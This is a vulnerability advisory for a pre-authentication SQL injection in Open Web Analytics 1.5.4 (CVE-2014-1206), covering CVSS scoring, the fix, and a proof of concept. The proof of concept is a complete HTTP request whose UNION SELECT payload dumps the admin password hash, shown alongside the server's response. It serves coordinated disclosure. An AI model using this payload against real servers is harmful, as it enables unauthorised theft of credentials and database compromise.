Open Web Analytics (OWA) is open source web analytics software that can track and analyze how visitors use websites and applications. OWA is vulnerable to SQL injection that allows an attacker to execute arbitrary SQL statements in the context of the configured OWA database user without authenticating to the web application. This vulnerability affects Open Web Analytics version 1.5.4.
Title: Open Web Analytics Pre-Auth SQL Injection Advisory ID: SWRX-2014-001 Advisory URL: http://www.secureworks.com/cyber-threat-intelligence/advisories/SWRX-2014-001/ Date published: Thursday, January 9, 2014 CVE: CVE-2014-1206 CVSS v2 base score: 7.5 Date of last update: Wednesday, January 8, 2014 Vendors contacted: Open Web Analytics Release mode: Coordinated Discovered by: Dana James Traversie, Dell SecureWorks Summary Open Web Analytics (OWA) is open source web analytics software that can track and analyze how visitors use websites and applications. OWA is vulnerable to SQL injection that allows an attacker to execute arbitrary SQL statements in the context of the configured OWA database user without authenticating to the web application. Affected products This vulnerability affects Open Web Analytics v1.5.4. Vendor Information, Solutions, and Workarounds The vendor has released an updated version to address this vulnerability. OWA users should upgrade to version v1.5.5 or later. Details An SQL injection vulnerability exists in Open Web Analytics v1.5.4 due to insufficient input validation of the ‘owa_email_address’ parameter on the password reset page. The password reset page does not require user authentication. A remote attacker can leverage this issue to execute arbitrary SQL statements in the context of the configured OWA database user. The impact of the vulnerability varies based on the deployment and configuration of the OWA, database, and web server software. Successful exploitation could result in complete loss of confidentiality, integrity, and availability in the OWA database and may affect the entire underlying database management system. This issue could also lead to operating system compromise under the right conditions. CVSS severity (version 2.0) Access vector: Network Access complexity: Low Authentication: None Impact type: Manipulation of SQL queries and execution of arbitrary SQL commands on the underlying database Confidentiality impact: Partial Integrity impact: Partial Availability impact: Partial CVSS v2 base score: 7.5 CVSS v2 impact subscore: 6.4 CVSS v2 exploitability subscore: 10 CVSS v2 vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) Proof of concept Request: POST /owa/index.php?owa_do=base.passwordResetForm HTTP/1.1 Host: 10.11.28.70 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.11.28.70/owa/index.php?owa_do=base.passwordResetForm Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 296 owa_email_address=-4534%27+UNION+ALL+SELECT+3627%2C3627%2C3627%2C3627%2C3627%2CCONCAT%280x7177766871%2CIFNULL%28CAST%28password+AS+CHAR%29%2C0x20%29%2C0x7176627971%29%2C3627%2C3627%2C3627%2C3627+FROM+owa.owa_user+LIMIT+0%2C1%23&owa_action=base.passwordResetRequest&owa_submit=Request+New+Password Response: HTTP/1.1 200 OK Date: Fri, 14 Feb 2014 17:03:43 GMT Server: Apache/2.2.15 (Red Hat) X-Powered-By: PHP/5.3.3 Content-Length: 3538 Connection: close Content-Type: text/html; charset=UTF-8 Invalid address: qwvhqe2744931d91565ed5b44a1d52746afa0qvbyq<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title> - Open Web Analytics</title> <!-- HEAD Elements --> .. The password hash of the admin user included in the response: e2744931d91565ed5b44a1d52746afa0 Revision history 1.0 2014-01-09: Initial advisory release # 0day.today [2018-04-12] #